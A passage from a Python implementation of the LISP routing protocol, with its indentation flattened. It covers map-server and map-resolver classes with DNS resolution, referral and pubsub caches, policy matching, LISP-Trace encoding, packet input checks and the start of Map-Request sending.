# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in list(self.individual_registrations.values()):
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (addr in new_rle): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (list(old_rle.keys()) == list(new_rle.keys())): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
list(old_rle.keys()), list(new_rle.keys())))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr(object):
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in list(lisp_map_resolvers_list.values()):
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (key not in lisp_map_resolvers_list): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root(object):
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in list(self.referral_set.values()):
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node(object):
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms(object):
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = list(lisp_map_servers_list.values())[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in list(lisp_map_servers_list.values()):
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (key not in lisp_map_servers_list): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface(object):
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime(object):
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match(object):
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy(object):
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if (name in lisp_geo_list) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if (name in lisp_elp_list) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if (name in lisp_rle_list) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if (name in lisp_json_list) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub(object):
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
self.eid_prefix = None
#enddef
def add(self, eid_prefix):
self.eid_prefix = eid_prefix
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (eid not in lisp_pubsub_cache):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (self.xtr_id in pubsub):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (eid in lisp_pubsub_cache):
pubsub = lisp_pubsub_cache[eid]
if (self.xtr_id in pubsub):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace(object):
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in list(lisp_map_servers_list.values()):
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in list(lisp_map_servers_list.values()): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9:10]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Do we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc,
pubsub=False):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
map_request.subscribe_bit = pubsub
map_request.xtr_id_present = pubsub
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
